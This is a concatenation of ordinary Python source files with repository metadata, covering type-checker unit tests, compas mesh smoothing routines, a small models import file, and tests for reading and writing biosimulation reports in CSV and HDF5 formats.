f00f64907e1c4ff9a5e03ffa5b46bd1f7dbb5d75
|
[
"MIT"
] | 1
|
2018-02-14T09:47:15.000Z
|
2018-02-14T09:47:15.000Z
|
src/test_type_checkers.py
|
jsphweid/annhouga
|
f00f64907e1c4ff9a5e03ffa5b46bd1f7dbb5d75
|
[
"MIT"
] | null | null | null |
src/test_type_checkers.py
|
jsphweid/annhouga
|
f00f64907e1c4ff9a5e03ffa5b46bd1f7dbb5d75
|
[
"MIT"
] | null | null | null |
import type_checkers as types
# is_int
def test_basic_is_int():
    # Plain truthiness asserts are the idiomatic pytest form; comparing to
    # True/False with == is flagged by PEP 8 / flake8 E712.
    assert types.is_int(5)

def test_string_cannot_be_int():
    assert not types.is_int('5')

def test_float_is_not_int1():
    assert not types.is_int(1.53)

def test_float_is_not_int2():
    assert not types.is_int(5.)

def test_boolean_is_not_int1():
    # bool is a subclass of int, but is_int is expected to reject it.
    assert not types.is_int(False)

def test_boolean_is_not_int2():
    assert not types.is_int(True)
# is_float
def test_basic_is_float():
    # Truthiness asserts instead of == True / == False (PEP 8 / E712).
    assert types.is_float(4.3)

def test_string_cannot_be_float():
    assert not types.is_float('5')

def test_int_is_not_float():
    assert not types.is_float(5)

def test_plain_zero_is_not_float():
    assert not types.is_float(0)

def test_boolean_is_not_float1():
    assert not types.is_float(False)

def test_boolean_is_not_float2():
    assert not types.is_float(True)
# is_real_number
def test_int_is_real_number():
    # Truthiness asserts instead of == True / == False (PEP 8 / E712).
    assert types.is_real_number(5)

def test_float_is_real_number():
    assert types.is_real_number(5.1)

def test_complex_num_is_not_real_number():
    assert not types.is_real_number(1j)

def test_string_is_not_real_number():
    assert not types.is_real_number('test')

def test_dict_is_not_real_number():
    assert not types.is_real_number({})

def test_list_is_not_real_number():
    assert not types.is_real_number([1])
# is_list_with_two_numbers
def test_is_list_with_two_numbers1():
    # Truthiness asserts instead of == True / == False (PEP 8 / E712).
    assert types.is_list_with_two_numbers([1, 2])

def test_is_list_with_two_numbers2():
    assert types.is_list_with_two_numbers([1., 2])

def test_is_list_with_two_numbers3():
    assert types.is_list_with_two_numbers([-4, 2.3248])

def test_list_with_3_numbers_is_false():
    assert not types.is_list_with_two_numbers([-4, 2.3248, 11])

def test_list_with_a_string_is_false():
    assert not types.is_list_with_two_numbers(['lol', 2.3248])

def test_dict_with_two_items_is_false():
    assert not types.is_list_with_two_numbers({ "one": 1, "two": 2 })
# is_list_of_dictionaries
def test_is_list_of_dictionaries():
    # Truthiness asserts instead of == True / == False (PEP 8 / E712).
    assert types.is_list_of_dictionaries([{}, {}])

def test_is_list_of_dictionaries_with_lists_is_false():
    assert not types.is_list_of_dictionaries([[], []])

def test_is_list_of_dictionaries_with_strs_is_false():
    assert not types.is_list_of_dictionaries(['test', 'hi'])

def test_is_list_of_dictionaries_with_ints_and_dicts_is_false():
    assert not types.is_list_of_dictionaries([5, {}])
| 26.255102
| 74
| 0.748931
| 429
| 2,573
| 4
| 0.137529
| 0.118298
| 0.212121
| 0.075758
| 0.736014
| 0.708625
| 0.589744
| 0.472611
| 0.33042
| 0.109557
| 0
| 0.023329
| 0.133696
| 2,573
| 97
| 75
| 26.525773
| 0.746523
| 0.030703
| 0
| 0
| 0
| 0
| 0.008447
| 0
| 0
| 0
| 0
| 0
| 0.491228
| 1
| 0.491228
| true
| 0
| 0.017544
| 0
| 0.508772
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
9afd34867cbe58d5bcad884cfe3c8288e82a9b32
| 173
|
py
|
Python
|
MentalUs/models.py
|
realityone/MentalUs
|
1c9c267efc258e274839d8e040a42272821d6e3f
|
[
"Apache-2.0"
] | null | null | null |
MentalUs/models.py
|
realityone/MentalUs
|
1c9c267efc258e274839d8e040a42272821d6e3f
|
[
"Apache-2.0"
] | null | null | null |
MentalUs/models.py
|
realityone/MentalUs
|
1c9c267efc258e274839d8e040a42272821d6e3f
|
[
"Apache-2.0"
] | null | null | null |
from user.models import MTUser, MTExtendFields, MTUserExtendInfo
from general.models import MTAnnouncement
from scale.models import MTScale, MTScaleResult, MTUnfinishedScale
| 57.666667
| 66
| 0.872832
| 19
| 173
| 7.947368
| 0.684211
| 0.238411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086705
| 173
| 3
| 66
| 57.666667
| 0.955696
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b11301e97f7fd1b3cca4413ad186732d22b4c61a
| 8,063
|
py
|
Python
|
src/compas/datastructures/mesh/smoothing.py
|
mpopescu/compas
|
55f259607deea501f862cbaea79bd97d7e56ead6
|
[
"MIT"
] | null | null | null |
src/compas/datastructures/mesh/smoothing.py
|
mpopescu/compas
|
55f259607deea501f862cbaea79bd97d7e56ead6
|
[
"MIT"
] | 9
|
2019-09-11T08:53:19.000Z
|
2019-09-16T08:35:39.000Z
|
src/compas/datastructures/mesh/smoothing.py
|
Licini/compas
|
34f65adb3d0abc3f403312ffba62aa76f3376292
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from compas.geometry import centroid_points
from compas.geometry import centroid_polygon
# Public API of this module.
__all__ = [
    'mesh_smooth_centroid',
    'mesh_smooth_centerofmass',
    'mesh_smooth_area',
]
def mesh_smooth_centroid(mesh, fixed=None, kmax=100, damping=0.5, callback=None, callback_args=None):
    """Smooth a mesh by moving every free vertex to the centroid of its neighbors.

    Parameters
    ----------
    mesh : Mesh
        A mesh object.
    fixed : list, optional
        The fixed vertices of the mesh.
    kmax : int, optional
        The maximum number of iterations.
    damping : float, optional
        The damping factor.
    callback : callable, optional
        A user-defined callback function to be executed after every iteration.
    callback_args : list, optional
        A list of arguments to be passed to the callback.

    Raises
    ------
    Exception
        If a callback is provided, but it is not callable.
    """
    if callback and not callable(callback):
        raise Exception('Callback is not callable.')
    anchors = set(fixed or [])
    for iteration in range(kmax):
        # Snapshot all coordinates so every move in this pass is computed
        # from the positions at the start of the pass.
        coords = {vkey: mesh.vertex_coordinates(vkey) for vkey in mesh.vertices()}
        for vkey, attr in mesh.vertices(True):
            if vkey in anchors:
                continue
            x, y, z = coords[vkey]
            target = centroid_points([coords[nbr] for nbr in mesh.vertex_neighbors(vkey)])
            cx, cy, cz = target
            # Damped step toward the neighbor centroid.
            attr['x'] += damping * (cx - x)
            attr['y'] += damping * (cy - y)
            attr['z'] += damping * (cz - z)
        if callback:
            callback(iteration, callback_args)
def mesh_smooth_centerofmass(mesh, fixed=None, kmax=100, damping=0.5, callback=None, callback_args=None):
    """Smooth a mesh by moving every free vertex to the center of mass of the polygon formed by the neighboring vertices.

    Parameters
    ----------
    mesh : Mesh
        A mesh object.
    fixed : list, optional
        The fixed vertices of the mesh.
    kmax : int, optional
        The maximum number of iterations.
    damping : float, optional
        The damping factor.
    callback : callable, optional
        A user-defined callback function to be executed after every iteration.
    callback_args : list, optional
        A list of arguments to be passed to the callback.

    Raises
    ------
    Exception
        If a callback is provided, but it is not callable.

    Examples
    --------
    .. plot::
        :include-source:

        import compas
        from compas.datastructures import Mesh
        from compas.datastructures import mesh_smooth_centerofmass
        from compas_plotters import MeshPlotter

        mesh = Mesh.from_obj(compas.get('faces.obj'))
        fixed = [key for key in mesh.vertices() if mesh.vertex_degree(key) == 2]

        mesh_smooth_centerofmass(mesh, fixed=fixed)

        plotter = MeshPlotter(mesh)
        plotter.draw_vertices(facecolor={key: '#ff0000' for key in fixed})
        plotter.draw_faces()
        plotter.draw_edges()
        plotter.show()
    """
    if callback:
        if not callable(callback):
            raise Exception('Callback is not callable.')
    fixed = fixed or []
    fixed = set(fixed)
    for k in range(kmax):
        # Snapshot all coordinates so every move in this pass is computed
        # from the positions at the start of the pass.
        key_xyz = {key: mesh.vertex_coordinates(key) for key in mesh.vertices()}
        for key, attr in mesh.vertices(True):
            if key in fixed:
                continue
            x, y, z = key_xyz[key]
            # ordered=True: centroid_polygon treats the neighbors as a polygon loop.
            cx, cy, cz = centroid_polygon([key_xyz[nbr] for nbr in mesh.vertex_neighbors(key, ordered=True)])
            # Damped step toward the polygon center of mass.
            attr['x'] += damping * (cx - x)
            attr['y'] += damping * (cy - y)
            attr['z'] += damping * (cz - z)
        if callback:
            callback(k, callback_args)
def mesh_smooth_area(mesh, fixed=None, kmax=100, damping=0.5, callback=None, callback_args=None):
    """Smooth a mesh by moving each vertex to the barycenter of the centroids of the surrounding faces, weighted by area.

    Parameters
    ----------
    mesh : Mesh
        A mesh object.
    fixed : list, optional
        The fixed vertices of the mesh.
    kmax : int, optional
        The maximum number of iterations.
    damping : float, optional
        The damping factor.
    callback : callable, optional
        A user-defined callback function to be executed after every iteration.
    callback_args : list, optional
        A list of arguments to be passed to the callback.

    Raises
    ------
    Exception
        If a callback is provided, but it is not callable.

    Examples
    --------
    .. plot::
        :include-source:

        import compas
        from compas.datastructures import Mesh
        from compas.datastructures import mesh_smooth_area
        from compas_plotters import MeshPlotter

        mesh = Mesh.from_obj(compas.get('faces.obj'))
        fixed = [key for key in mesh.vertices() if mesh.vertex_degree(key) == 2]

        mesh_smooth_area(mesh, fixed=fixed)

        plotter = MeshPlotter(mesh)
        plotter.draw_vertices(facecolor={key: '#ff0000' for key in fixed})
        plotter.draw_faces()
        plotter.draw_edges()
        plotter.show()
    """
    if callback:
        if not callable(callback):
            raise Exception('Callback is not callable.')
    fixed = fixed or []
    fixed = set(fixed)
    for k in range(kmax):
        # Per-pass caches: coordinates, face centroids and face areas are
        # all computed once from the start-of-pass geometry.
        key_xyz = {key: mesh.vertex_coordinates(key)[:] for key in mesh.vertices()}
        fkey_centroid = {fkey: mesh.face_centroid(fkey) for fkey in mesh.faces()}
        fkey_area = {fkey: mesh.face_area(fkey) for fkey in mesh.faces()}
        for key, attr in mesh.vertices(True):
            if key in fixed:
                continue
            x, y, z = key_xyz[key]
            # Accumulate the area-weighted sum of surrounding face centroids.
            A = 0
            ax, ay, az = 0, 0, 0
            for fkey in mesh.vertex_faces(key, ordered=True):
                if fkey is None:
                    # Skip None entries (presumably boundary gaps in the
                    # ordered face cycle — TODO confirm against Mesh API).
                    continue
                a = fkey_area[fkey]
                c = fkey_centroid[fkey]
                ax += a * c[0]
                ay += a * c[1]
                az += a * c[2]
                A += a
            if A:
                ax = ax / A
                ay = ay / A
                az = az / A
            # NOTE(review): when A == 0 the target stays (0, 0, 0), pulling
            # the vertex toward the origin — confirm this is intended.
            attr['x'] += damping * (ax - x)
            attr['y'] += damping * (ay - y)
            attr['z'] += damping * (az - z)
        if callback:
            callback(k, callback_args)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
    # Visual smoke test: smooth a sample mesh and draw the original edges
    # (grey lines) under the smoothed result for comparison.
    import compas
    from compas.datastructures import Mesh
    from compas_plotters import MeshPlotter
    mesh = Mesh.from_obj(compas.get('faces.obj'))
    fixed = list(mesh.vertices_where({'vertex_degree': 2}))
    lines = []
    for u, v in mesh.edges():
        lines.append({
            'start': mesh.vertex_coordinates(u, 'xy'),
            'end': mesh.vertex_coordinates(v, 'xy'),
            'color': '#cccccc',
            'width': 1.0,
        })
    mesh_smooth_area(mesh, fixed=fixed, kmax=100)
    plotter = MeshPlotter(mesh, figsize=(10, 7))
    plotter.draw_lines(lines)
    plotter.draw_vertices(facecolor={key: '#ff0000' for key in fixed})
    plotter.draw_edges()
    plotter.show()
| 27.803448
| 121
| 0.581049
| 981
| 8,063
| 4.66055
| 0.139653
| 0.018373
| 0.015748
| 0.045932
| 0.832021
| 0.800525
| 0.783902
| 0.776903
| 0.776903
| 0.766842
| 0
| 0.008868
| 0.300757
| 8,063
| 289
| 122
| 27.899654
| 0.802057
| 0.448964
| 0
| 0.45
| 0
| 0
| 0.052513
| 0.006002
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03
| false
| 0
| 0.08
| 0
| 0.11
| 0.01
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b15ac0e21510ba636bab8eb495fd1c8fd5a1408b
| 138
|
py
|
Python
|
dist/Basilisk/simulation/vscmgStateEffector/__init__.py
|
ian-cooke/basilisk_mag
|
a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14
|
[
"0BSD"
] | null | null | null |
dist/Basilisk/simulation/vscmgStateEffector/__init__.py
|
ian-cooke/basilisk_mag
|
a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14
|
[
"0BSD"
] | 1
|
2019-03-13T20:52:22.000Z
|
2019-03-13T20:52:22.000Z
|
dist/Basilisk/simulation/vscmgStateEffector/__init__.py
|
ian-cooke/basilisk_mag
|
a8b1e37c31c1287549d6fd4d71fcaa35b6fc3f14
|
[
"0BSD"
] | null | null | null |
# This __init__.py file for the vscmgStateEffector package is automatically generated by the build system
from vscmgStateEffector import *
| 69
| 105
| 0.847826
| 18
| 138
| 6.277778
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 138
| 2
| 106
| 69
| 0.941667
| 0.746377
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b1686ef2960b20506242b7efb0b494b24a5478d7
| 33
|
py
|
Python
|
singleton_widgets/__init__.py
|
sagemath/sage-combinat-widgets
|
b17c62ed982a7d4ec7a50932765b978069dc25da
|
[
"BSL-1.0"
] | 3
|
2018-09-05T15:04:35.000Z
|
2021-11-09T12:57:54.000Z
|
singleton_widgets/__init__.py
|
sagemath/sage-combinat-widgets
|
b17c62ed982a7d4ec7a50932765b978069dc25da
|
[
"BSL-1.0"
] | 18
|
2018-08-20T13:49:33.000Z
|
2022-01-19T15:24:07.000Z
|
singleton_widgets/__init__.py
|
sagemath/sage-combinat-widgets
|
b17c62ed982a7d4ec7a50932765b978069dc25da
|
[
"BSL-1.0"
] | 5
|
2019-04-13T16:50:04.000Z
|
2021-11-09T12:57:43.000Z
|
from .singleton_widgets import *
| 16.5
| 32
| 0.818182
| 4
| 33
| 6.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b185a3f8f92282de65544603e8fbe8dbe1798429
| 14,979
|
py
|
Python
|
tests/report/test_report_io.py
|
virtualcell/Biosimulators_utils
|
1b34e1e0a9ace706d245e9d515d0fae1e55a248d
|
[
"MIT"
] | null | null | null |
tests/report/test_report_io.py
|
virtualcell/Biosimulators_utils
|
1b34e1e0a9ace706d245e9d515d0fae1e55a248d
|
[
"MIT"
] | null | null | null |
tests/report/test_report_io.py
|
virtualcell/Biosimulators_utils
|
1b34e1e0a9ace706d245e9d515d0fae1e55a248d
|
[
"MIT"
] | null | null | null |
from biosimulators_utils.report import data_model
from biosimulators_utils.report import io
from biosimulators_utils.report.warnings import MissingDataWarning, ExtraDataWarning
from biosimulators_utils.sedml.data_model import Report, DataSet
import numpy
import numpy.testing
import os
import shutil
import tempfile
import unittest
class ReportIoTestCase(unittest.TestCase):
    def setUp(self):
        # Fresh scratch directory per test; removed again in tearDown.
        self.dirname = tempfile.mkdtemp()
    def tearDown(self):
        # Remove the scratch directory created in setUp.
        shutil.rmtree(self.dirname)
    def test_read_write(self):
        """Round-trip reports through the tabular (CSV/TSV/XLSX) and HDF5 writers/readers.

        The assertions below show that the tabular formats pad every data set
        to a common length with NaN, coerce values to float64, and reject
        multidimensional data; HDF5 preserves dtype, shape and missing (None)
        data sets exactly.
        """
        report_1 = Report(
            id='report_1',
            data_sets=[
                DataSet(id='w', label='W'),
                DataSet(id='x', label='X'),
                DataSet(id='y', label='Y'),
                DataSet(id='z', label='Z'),
            ],
        )
        report_2 = Report(
            id='report_2',
            data_sets=[
                DataSet(id='a', label='A'),
                DataSet(id='b', label='B'),
                DataSet(id='c', label='C'),
                DataSet(id='d', label='D'),
            ],
        )
        report_3 = Report(
            id='report_3',
            data_sets=[
                DataSet(id='a', label='A'),
                DataSet(id='b', label='B'),
                DataSet(id='c', label='C'),
                DataSet(id='d', label='D'),
            ],
        )
        # Mix of missing (None), int, float-with-NaN and 0-d results.
        data_set_results_1 = data_model.DataSetResults({
            'w': None,
            'x': numpy.array([1, 2, 3]),
            'y': numpy.array([4., numpy.nan]),
            'z': numpy.array(6.),
        })
        data_set_results_2 = data_model.DataSetResults({
            'a': numpy.array([1, 2]),
            'b': numpy.array([7., 8., 9.]),
            'c': numpy.array(True),
            'd': None,
        })
        # Data set 'a' is 2-D here — only writable to HDF5 (see below).
        data_set_results_3 = data_model.DataSetResults({
            'a': numpy.array([[1, 2], [3, 4], [5, 6]]),
            'b': numpy.array([7., 8., 9.]),
            'c': numpy.array(True),
            'd': None,
        })
        # CSV, TSV
        for format in [data_model.ReportFormat.csv, data_model.ReportFormat.tsv, data_model.ReportFormat.xlsx]:
            rel_path_1 = os.path.join(format.value, 'a/b/c.sedml', report_1.id)
            rel_path_2 = os.path.join(format.value, 'a/d.sedml', report_2.id)
            rel_path_3 = os.path.join(format.value, 'e.sedml', report_2.id)
            io.ReportWriter().run(report_1, data_set_results_1, self.dirname, rel_path_1, format=format)
            io.ReportWriter().run(report_2, data_set_results_2, self.dirname, rel_path_2, format=format)
            # Tabular formats cannot represent the 2-D data set in report_3.
            with self.assertRaisesRegex(ValueError, 'Multidimensional reports cannot be exported'):
                io.ReportWriter().run(report_3, data_set_results_3, self.dirname, rel_path_3, format=format)
            data_set_results_1_b = io.ReportReader().run(report_1, self.dirname, rel_path_1, format=format)
            data_set_results_2_b = io.ReportReader().run(report_2, self.dirname, rel_path_2, format=format)
            self.assertEqual(set(io.ReportReader().get_ids(self.dirname, format=format)), set([rel_path_1, rel_path_2]))
            # Missing / short / scalar data sets come back padded to the
            # longest data set with NaN, and everything is float64.
            numpy.testing.assert_allclose(data_set_results_1_b['w'], numpy.array([numpy.nan, numpy.nan, numpy.nan]))
            numpy.testing.assert_allclose(data_set_results_1_b['x'], numpy.array([1., 2., 3.]))
            numpy.testing.assert_allclose(data_set_results_1_b['y'], numpy.array([4., numpy.nan, numpy.nan]))
            numpy.testing.assert_allclose(data_set_results_1_b['z'], numpy.array([6., numpy.nan, numpy.nan]))
            self.assertEqual(data_set_results_1_b['w'].dtype.name, 'float64')
            self.assertEqual(data_set_results_1_b['x'].dtype.name, 'float64')
            self.assertEqual(data_set_results_1_b['y'].dtype.name, 'float64')
            self.assertEqual(data_set_results_1_b['z'].dtype.name, 'float64')
            numpy.testing.assert_allclose(data_set_results_2_b['a'], numpy.array([1., 2., numpy.nan]))
            numpy.testing.assert_allclose(data_set_results_2_b['b'], numpy.array([7., 8., 9.]))
            numpy.testing.assert_allclose(data_set_results_2_b['c'], numpy.array([1., numpy.nan, numpy.nan]))
            numpy.testing.assert_allclose(data_set_results_2_b['d'], numpy.array([numpy.nan, numpy.nan, numpy.nan]))
            self.assertEqual(data_set_results_2_b['a'].dtype.name, 'float64')
            self.assertEqual(data_set_results_2_b['b'].dtype.name, 'float64')
            self.assertEqual(data_set_results_2_b['c'].dtype.name, 'float64')
            self.assertEqual(data_set_results_2_b['d'].dtype.name, 'float64')
        # HDF
        for format in [data_model.ReportFormat.h5]:
            rel_path_1 = os.path.join(format.value, 'a/b/c.sedml', report_1.id)
            rel_path_2 = os.path.join(format.value, 'a/d.sedml', report_2.id)
            rel_path_3 = os.path.join(format.value, 'e.sedml', report_2.id)
            io.ReportWriter().run(report_1, data_set_results_1, self.dirname, rel_path_1, format=format)
            io.ReportWriter().run(report_2, data_set_results_2, self.dirname, rel_path_2, format=format)
            # The 2-D data set writes without error in HDF5.
            io.ReportWriter().run(report_3, data_set_results_3, self.dirname, rel_path_3, format=format)
            data_set_results_1_b = io.ReportReader().run(report_1, self.dirname, rel_path_1, format=format)
            data_set_results_2_b = io.ReportReader().run(report_2, self.dirname, rel_path_2, format=format)
            data_set_results_3_b = io.ReportReader().run(report_3, self.dirname, rel_path_3, format=format)
            self.assertEqual(set(io.ReportReader().get_ids(self.dirname, format=format)), set([rel_path_1, rel_path_2, rel_path_3]))
            # HDF5 round-trips None, int64/float64/bool dtypes and shapes exactly.
            self.assertEqual(data_set_results_1_b['w'], None)
            numpy.testing.assert_allclose(data_set_results_1_b['x'], numpy.array([1, 2, 3]))
            numpy.testing.assert_allclose(data_set_results_1_b['y'], numpy.array([4., numpy.nan]))
            numpy.testing.assert_allclose(data_set_results_1_b['z'], numpy.array(6.))
            self.assertEqual(data_set_results_1_b['x'].dtype.name, 'int64')
            self.assertEqual(data_set_results_1_b['y'].dtype.name, 'float64')
            self.assertEqual(data_set_results_1_b['z'].dtype.name, 'float64')
            numpy.testing.assert_allclose(data_set_results_2_b['a'], numpy.array([1, 2]))
            numpy.testing.assert_allclose(data_set_results_2_b['b'], numpy.array([7., 8., 9.]))
            numpy.testing.assert_allclose(data_set_results_2_b['c'], numpy.array(True))
            self.assertEqual(data_set_results_2_b['d'], None)
            self.assertEqual(data_set_results_2_b['a'].dtype.name, 'int64')
            self.assertEqual(data_set_results_2_b['b'].dtype.name, 'float64')
            self.assertEqual(data_set_results_2_b['c'].dtype.name, 'bool')
            numpy.testing.assert_allclose(data_set_results_3_b['a'], numpy.array([[1, 2], [3, 4], [5, 6]]))
            numpy.testing.assert_allclose(data_set_results_3_b['b'], numpy.array([7., 8., 9.]))
            numpy.testing.assert_allclose(data_set_results_3_b['c'], numpy.array(True))
            self.assertEqual(data_set_results_3_b['d'], None)
            self.assertEqual(data_set_results_3_b['a'].dtype.name, 'int64')
            self.assertEqual(data_set_results_3_b['b'].dtype.name, 'float64')
            self.assertEqual(data_set_results_3_b['c'].dtype.name, 'bool')
def test_read_write_warnings(self):
    """Reading a report whose declared data sets have drifted should warn.

    Writes a three-data-set report to HDF5, then checks that reading it
    with an extra declared data set raises ``MissingDataWarning`` and that
    reading it with fewer declared data sets raises ``ExtraDataWarning``.
    """
    report = Report(
        id='report_1',
        data_sets=[DataSet(id=ds_id, label=ds_id.upper()) for ds_id in ['x', 'y', 'z']],
    )
    results = data_model.DataSetResults({
        ds_id: numpy.array(vals)
        for ds_id, vals in [('x', [1., 2.]), ('y', [3., 4.]), ('z', [5., 6.])]
    })
    rel_path = os.path.join('a/b/c.sedml', report.id)
    io.ReportWriter().run(report, results, self.dirname, rel_path, format=data_model.ReportFormat.h5)

    # Declare a data set that was never written: reading should warn about it.
    report.data_sets.append(DataSet(id='w', label='W'))
    with self.assertWarns(MissingDataWarning):
        io.ReportReader().run(report, self.dirname, rel_path, format=data_model.ReportFormat.h5)

    # Drop two declared data sets: the stored file now has extra data.
    del report.data_sets[-2:]
    with self.assertWarns(ExtraDataWarning):
        io.ReportReader().run(report, self.dirname, rel_path, format=data_model.ReportFormat.h5)
def test_read_write_duplicate_labels(self):
    """Data sets with duplicate labels round-trip through CSV by position."""
    expected = {'x': [1., 2.], 'y': [3., 4.], 'z': [5., 6.]}

    # Case 1: all labels identical, read back in the same order as written.
    report = Report(
        id='report_1',
        data_sets=[
            DataSet(id='x', label='A'),
            DataSet(id='y', label='A'),
            DataSet(id='z', label='A'),
        ],
    )
    results = data_model.DataSetResults(
        {ds_id: numpy.array(vals) for ds_id, vals in expected.items()})
    rel_path = os.path.join('a/b/c.sedml', report.id)
    io.ReportWriter().run(report, results, self.dirname, rel_path, format=data_model.ReportFormat.csv)
    round_tripped = io.ReportReader().run(report, self.dirname, rel_path, format=data_model.ReportFormat.csv)
    for ds_id, vals in expected.items():
        numpy.testing.assert_allclose(round_tripped[ds_id], numpy.array(vals))

    # Case 2: duplicate labels read back in a different order; only the
    # uniquely-labeled data set can be recovered unambiguously.
    report = Report(
        id='report_1',
        data_sets=[
            DataSet(id='x', label='X'),
            DataSet(id='y', label='X'),
            DataSet(id='z', label='Z'),
        ],
    )
    results = data_model.DataSetResults(
        {ds_id: numpy.array(vals) for ds_id, vals in expected.items()})
    rel_path = os.path.join('a/b/c.sedml', report.id)
    io.ReportWriter().run(report, results, self.dirname, rel_path, format=data_model.ReportFormat.csv)
    reordered_report = Report(
        id='report_1',
        data_sets=[
            DataSet(id='x', label='X'),
            DataSet(id='z', label='Z'),
            DataSet(id='y', label='X'),
        ],
    )
    round_tripped = io.ReportReader().run(reordered_report, self.dirname, rel_path, format=data_model.ReportFormat.csv)
    self.assertEqual(set(round_tripped.keys()), {'z'})
    numpy.testing.assert_allclose(round_tripped['z'], numpy.array([5., 6.]))
def test_overwrite_report(self):
    """Writing a report twice to the same path replaces the stored values."""
    report = Report(
        id='report_1',
        data_sets=[DataSet(id=ds_id, label=ds_id.upper()) for ds_id in ['x', 'y', 'z']],
    )
    base = {
        'x': numpy.array([1., 2.]),
        'y': numpy.array([3., 4.]),
        'z': numpy.array([5., 6.]),
    }
    rel_path = os.path.join('a/b/c.sedml', report.id)

    # First write: values round-trip unchanged.
    io.ReportWriter().run(report, data_model.DataSetResults(dict(base)), self.dirname, rel_path,
                          format=data_model.ReportFormat.h5)
    read_back = io.ReportReader().run(report, self.dirname, rel_path, format=data_model.ReportFormat.h5)
    for ds_id, vals in base.items():
        numpy.testing.assert_allclose(read_back[ds_id], vals)

    # Second write with shifted values: reading must reflect the overwrite.
    shifted = data_model.DataSetResults({ds_id: vals + 1. for ds_id, vals in base.items()})
    io.ReportWriter().run(report, shifted, self.dirname, rel_path, format=data_model.ReportFormat.h5)
    read_back = io.ReportReader().run(report, self.dirname, rel_path, format=data_model.ReportFormat.h5)
    for ds_id, vals in base.items():
        numpy.testing.assert_allclose(read_back[ds_id], vals + 1.)
def test_write_error_handling(self):
    """Unsupported formats and multidimensional CSV exports must fail loudly."""
    # An unknown format string is rejected before anything is written.
    with self.assertRaisesRegex(NotImplementedError, 'is not supported'):
        io.ReportWriter().run(Report(), None, None, None, format='TSV')

    report = Report(data_sets=[DataSet(id='x', label='x')])
    results = data_model.DataSetResults({'x': numpy.zeros((3, ))})
    # A 1-D data set exports to CSV without complaint ...
    io.ReportWriter().run(report, results, self.dirname, '.', format=data_model.ReportFormat.csv)
    # ... but reshaping it to 2-D makes a tabular CSV export impossible.
    results['x'] = results['x'].reshape((3, 1))
    with self.assertRaisesRegex(ValueError, 'Multidimensional reports cannot be exported'):
        io.ReportWriter().run(report, results, self.dirname, '.', format=data_model.ReportFormat.csv)
def test_read_error_handling(self):
    """Reading with an unknown format string raises ``NotImplementedError``."""
    reader = io.ReportReader()
    with self.assertRaisesRegex(NotImplementedError, 'is not supported'):
        reader.run(Report(), None, None, format='TSV')
def test_get_ids(self):
    """``get_ids`` lists every report path written to an archive, per format."""
    report = Report(
        data_sets=[
            DataSet(id='A', label='A'),
            DataSet(id='B', label='A'),
        ],
    )
    results = data_model.DataSetResults({
        report.data_sets[0].id: numpy.array([1, 2, 3]),
        report.data_sets[1].id: numpy.array([4, 5, 6]),
    })
    report_paths = [
        'a/b/c.sedml/report1',
        'a/b/c.sedml/report2',
        'a/b/c.sedml/report3',
        'a/b/d.sedml/report4',
        'a/b/report5',
        'a/b/report6',
    ]
    filename = os.path.join(self.dirname, 'test')
    for format in [data_model.ReportFormat.h5, data_model.ReportFormat.csv]:
        # Write the same report under several SED-ML document paths and
        # check the archive enumerates all of them.
        for rel_path in report_paths:
            io.ReportWriter().run(report, results, filename, rel_path, format=format)
        self.assertEqual(set(io.ReportReader().get_ids(filename, format=format)), set(report_paths))

    # Enumerating with an unsupported format is an error.
    with self.assertRaisesRegex(NotImplementedError, 'is not supported'):
        io.ReportReader().get_ids(filename, format=None)
| 47.401899
| 132
| 0.602644
| 2,017
| 14,979
| 4.225087
| 0.059494
| 0.066534
| 0.133067
| 0.061605
| 0.873504
| 0.829735
| 0.811312
| 0.794532
| 0.767895
| 0.723187
| 0
| 0.029076
| 0.240003
| 14,979
| 315
| 133
| 47.552381
| 0.719519
| 0.003939
| 0
| 0.538462
| 0
| 0
| 0.050352
| 0
| 0
| 0
| 0
| 0
| 0.223077
| 1
